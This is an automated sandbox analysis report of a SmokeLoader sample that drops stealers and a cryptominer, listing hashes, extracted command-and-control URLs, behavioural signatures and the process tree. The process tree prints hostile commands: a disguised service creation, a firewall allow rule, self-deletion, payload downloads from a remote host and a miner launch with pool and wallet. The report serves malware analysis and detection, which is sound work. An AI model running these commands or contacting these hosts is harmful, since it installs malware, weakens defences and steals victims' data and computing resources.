Analysis
-
max time kernel
151s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
09/01/2022, 19:12
Static task
static1
General
-
Target
60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe
-
Size
290KB
-
MD5
8e61e663bc84142fd7a5190b7303e9a2
-
SHA1
8d8d7e1342520362c9df413540f811812a5b2de4
-
SHA256
60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b
-
SHA512
d871d697c9f7225c5d54e20a6e8de981736d706be022487b43609df77788d481a8df381cc791b940e77928e8eced6387a76940c2af770084b9a9cdd3d5e906f4
Malware Config
Extracted
smokeloader
2020
http://host-data-coin-11.com/
http://file-coin-host-12.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
Extracted
tofsee
patmushta.info
parubey.info
Extracted
raccoon
1.8.4-hotfixs
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 3384 created 1044 3384 WerFault.exe 97 -
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Arkei Stealer Payload 5 IoCs
resource yara_rule behavioral1/memory/524-132-0x0000000000400000-0x0000000002B86000-memory.dmp family_arkei behavioral1/memory/628-213-0x0000000000900000-0x0000000000CBF000-memory.dmp family_arkei behavioral1/memory/628-214-0x0000000000900000-0x0000000000CBF000-memory.dmp family_arkei behavioral1/memory/628-215-0x0000000000900000-0x0000000000CBF000-memory.dmp family_arkei behavioral1/memory/628-216-0x0000000000900000-0x0000000000CBF000-memory.dmp family_arkei -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
LoaderBot executable 1 IoCs
resource yara_rule behavioral1/memory/1220-317-0x0000000000DE0000-0x000000000123B000-memory.dmp loaderbot -
Blocklisted process makes network request 1 IoCs
flow pid Process 146 2700 WScript.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 22 IoCs
pid Process 3440 3748.exe 524 5745.exe 2684 64C3.exe 1428 6FD0.exe 1248 exrdnjyx.exe 2088 6FD0.exe 3500 DC66.exe 3736 DC66.exe 628 EF72.exe 1044 A0F.exe 1152 2C7D.exe 1380 4B9F.exe 2068 5B4F.exe 2720 extd.exe 3820 extd.exe 744 setup1.exe 792 extd.exe 1184 setup2.exe 3208 extd.exe 1220 setup3.exe 1792 extd.exe 1628 Driver.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral1/files/0x000700000001ab4c-277.dat upx behavioral1/files/0x000700000001ab4c-278.dat upx behavioral1/files/0x000700000001ab4c-282.dat upx behavioral1/files/0x000700000001ab4c-291.dat upx behavioral1/files/0x000700000001ab4c-299.dat upx behavioral1/files/0x000700000001ab4c-326.dat upx -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion EF72.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion EF72.exe -
Deletes itself 1 IoCs
pid Process 2084 Process not Found -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url setup3.exe -
Loads dropped DLL 3 IoCs
pid Process 628 EF72.exe 628 EF72.exe 628 EF72.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" setup2.exe Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\setup3.exe" setup3.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA EF72.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 628 EF72.exe 628 EF72.exe 1380 4B9F.exe 1184 setup2.exe 1220 setup3.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2520 set thread context of 3768 2520 60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe 68 PID 1248 set thread context of 3960 1248 exrdnjyx.exe 88 PID 1428 set thread context of 2088 1428 6FD0.exe 87 PID 3500 set thread context of 3736 3500 DC66.exe 95 -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 3384 1044 WerFault.exe 97 4088 744 WerFault.exe 111 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DC66.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3748.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3748.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3748.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DC66.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DC66.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EF72.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 EF72.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3312 timeout.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings cmd.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 146 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3768 60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe 3768 60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2084 Process not Found -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 636 Process not Found -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 3768 60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe 3440 3748.exe 2084 Process not Found 2084 Process not Found 2084 Process not Found 2084 Process not Found 3736 DC66.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1428 6FD0.exe Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeDebugPrivilege 2088 6FD0.exe Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeDebugPrivilege 1152 2C7D.exe Token: SeRestorePrivilege 3384 WerFault.exe Token: SeBackupPrivilege 3384 WerFault.exe Token: SeDebugPrivilege 3384 WerFault.exe Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeShutdownPrivilege 2084 Process not Found Token: SeCreatePagefilePrivilege 2084 Process not Found Token: SeDebugPrivilege 4088 WerFault.exe Token: SeShutdownPrivilege 2084 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2520 wrote to memory of 3768 2520 60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe 68 PID 2520 wrote to memory of 3768 2520 60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe 68 PID 2520 wrote to memory of 3768 2520 60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe 68 PID 2520 wrote to memory of 3768 2520 60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe 68 PID 2520 wrote to memory of 3768 2520 60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe 68 PID 2520 wrote to memory of 3768 2520 60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe 68 PID 2084 wrote to memory of 3440 2084 Process not Found 70 PID 2084 wrote to memory of 3440 2084 Process not Found 70 PID 2084 wrote to memory of 3440 2084 Process not Found 70 PID 2084 wrote to memory of 524 2084 Process not Found 71 PID 2084 wrote to memory of 524 2084 Process not Found 71 PID 2084 wrote to memory of 524 2084 Process not Found 71 PID 2084 wrote to memory of 2684 2084 Process not Found 72 PID 2084 wrote to memory of 2684 2084 Process not Found 72 PID 2084 wrote to memory of 2684 2084 Process not Found 72 PID 2084 wrote to memory of 1428 2084 Process not Found 73 PID 2084 wrote to memory of 1428 2084 Process not Found 73 PID 2084 wrote to memory of 1428 2084 Process not Found 73 PID 2684 wrote to memory of 2172 2684 64C3.exe 74 PID 2684 wrote to memory of 2172 2684 64C3.exe 74 PID 2684 wrote to memory of 2172 2684 64C3.exe 74 PID 2684 wrote to memory of 3636 2684 64C3.exe 76 PID 2684 wrote to memory of 3636 2684 64C3.exe 76 PID 2684 wrote to memory of 3636 2684 64C3.exe 76 PID 2684 wrote to memory of 2576 2684 64C3.exe 78 PID 2684 wrote to memory of 2576 2684 64C3.exe 78 PID 2684 wrote to memory of 2576 2684 64C3.exe 78 PID 2684 wrote to memory of 1180 2684 64C3.exe 80 PID 2684 wrote to memory of 1180 2684 64C3.exe 80 PID 2684 wrote to memory of 1180 2684 64C3.exe 80 PID 2684 wrote to memory of 2560 2684 64C3.exe 82 PID 2684 wrote to memory of 2560 2684 64C3.exe 82 PID 2684 wrote to memory of 2560 2684 64C3.exe 82 PID 2684 wrote to memory of 1480 2684 64C3.exe 85 PID 2684 wrote to memory of 1480 2684 64C3.exe 85 PID 2684 wrote to memory of 1480 2684 64C3.exe 85 PID 1428 wrote to memory of 2088 1428 6FD0.exe 87 PID 1428 wrote to memory of 2088 1428 6FD0.exe 87 PID 1428 wrote to memory of 2088 1428 6FD0.exe 87 PID 1248 wrote to memory of 3960 1248 exrdnjyx.exe 88 PID 1248 wrote to memory of 3960 1248 exrdnjyx.exe 88 PID 1248 wrote to memory of 3960 1248 exrdnjyx.exe 88 PID 1248 wrote to memory of 3960 1248 exrdnjyx.exe 88 PID 1248 wrote to memory of 3960 1248 exrdnjyx.exe 88 PID 1428 wrote to memory of 2088 1428 6FD0.exe 87 PID 1428 wrote to memory of 2088 1428 6FD0.exe 87 PID 1428 wrote to memory of 2088 1428 6FD0.exe 87 PID 1428 wrote to memory of 2088 1428 6FD0.exe 87 PID 1428 wrote to memory of 2088 1428 6FD0.exe 87 PID 2084 wrote to memory of 3872 2084 Process not Found 92 PID 2084 wrote to memory of 3872 2084 Process not Found 92 PID 2084 wrote to memory of 3872 2084 Process not Found 92 PID 2084 wrote to memory of 3872 2084 Process not Found 92 PID 2084 wrote to memory of 3532 2084 Process not Found 93 PID 2084 wrote to memory of 3532 2084 Process not Found 93 PID 2084 wrote to memory of 3532 2084 Process not Found 93 PID 2084 wrote to memory of 3500 2084 Process not Found 94 PID 2084 wrote to memory of 3500 2084 Process not Found 94 PID 2084 wrote to memory of 3500 2084 Process not Found 94 PID 3500 wrote to memory of 3736 3500 DC66.exe 95 PID 3500 wrote to memory of 3736 3500 DC66.exe 95 PID 3500 wrote to memory of 3736 3500 DC66.exe 95 PID 3500 wrote to memory of 3736 3500 DC66.exe 95 PID 3500 wrote to memory of 3736 3500 DC66.exe 95 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe"C:\Users\Admin\AppData\Local\Temp\60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Users\Admin\AppData\Local\Temp\60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe"C:\Users\Admin\AppData\Local\Temp\60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3768
-
-
C:\Users\Admin\AppData\Local\Temp\3748.exeC:\Users\Admin\AppData\Local\Temp\3748.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3440
-
C:\Users\Admin\AppData\Local\Temp\5745.exeC:\Users\Admin\AppData\Local\Temp\5745.exe1⤵
- Executes dropped EXE
PID:524
-
C:\Users\Admin\AppData\Local\Temp\64C3.exeC:\Users\Admin\AppData\Local\Temp\64C3.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\fsfqhvsd\2⤵PID:2172
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\exrdnjyx.exe" C:\Windows\SysWOW64\fsfqhvsd\2⤵PID:3636
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create fsfqhvsd binPath= "C:\Windows\SysWOW64\fsfqhvsd\exrdnjyx.exe /d\"C:\Users\Admin\AppData\Local\Temp\64C3.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:2576
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description fsfqhvsd "wifi internet conection"2⤵PID:1180
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start fsfqhvsd2⤵PID:2560
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:1480
-
-
C:\Users\Admin\AppData\Local\Temp\6FD0.exeC:\Users\Admin\AppData\Local\Temp\6FD0.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Users\Admin\AppData\Local\Temp\6FD0.exeC:\Users\Admin\AppData\Local\Temp\6FD0.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
C:\Windows\SysWOW64\fsfqhvsd\exrdnjyx.exeC:\Windows\SysWOW64\fsfqhvsd\exrdnjyx.exe /d"C:\Users\Admin\AppData\Local\Temp\64C3.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:3960
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:3872
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:3532
-
C:\Users\Admin\AppData\Local\Temp\DC66.exeC:\Users\Admin\AppData\Local\Temp\DC66.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Users\Admin\AppData\Local\Temp\DC66.exeC:\Users\Admin\AppData\Local\Temp\DC66.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3736
-
-
C:\Users\Admin\AppData\Local\Temp\EF72.exeC:\Users\Admin\AppData\Local\Temp\EF72.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:628 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\EF72.exe" & exit2⤵PID:920
-
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:3312
-
-
-
C:\Users\Admin\AppData\Local\Temp\A0F.exeC:\Users\Admin\AppData\Local\Temp\A0F.exe1⤵
- Executes dropped EXE
PID:1044 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 8722⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3384
-
-
C:\Users\Admin\AppData\Local\Temp\2C7D.exeC:\Users\Admin\AppData\Local\Temp\2C7D.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1152
-
C:\Users\Admin\AppData\Local\Temp\4B9F.exeC:\Users\Admin\AppData\Local\Temp\4B9F.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1380
-
C:\Users\Admin\AppData\Local\Temp\5B4F.exeC:\Users\Admin\AppData\Local\Temp\5B4F.exe1⤵
- Executes dropped EXE
PID:2068 -
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\5BE4.bat C:\Users\Admin\AppData\Local\Temp\5B4F.exe"2⤵
- Modifies registry class
PID:2000 -
C:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:2720
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12395\123.vbs"3⤵
- Blocklisted process makes network request
PID:2700
-
-
C:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\extd.exe "/download" "http://a0617224.xsph.ru/1.exe" "setup1.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:3820
-
-
C:\Users\Admin\AppData\Local\Temp\12395\setup1.exesetup1.exe3⤵
- Executes dropped EXE
PID:744 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 4124⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4088
-
-
-
C:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\extd.exe "/download" "http://a0617224.xsph.ru/2.exe" "setup2.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:792
-
-
C:\Users\Admin\AppData\Local\Temp\12395\setup2.exesetup2.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1184
-
-
C:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\extd.exe "/download" "http://a0617224.xsph.ru/3.exe" "setup3.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:3208
-
-
C:\Users\Admin\AppData\Local\Temp\12395\setup3.exesetup3.exe3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1220 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1628
-
-
-
C:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\extd.exe "" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:1792
-
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
2Defense Evasion
Disabling Security Tools
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1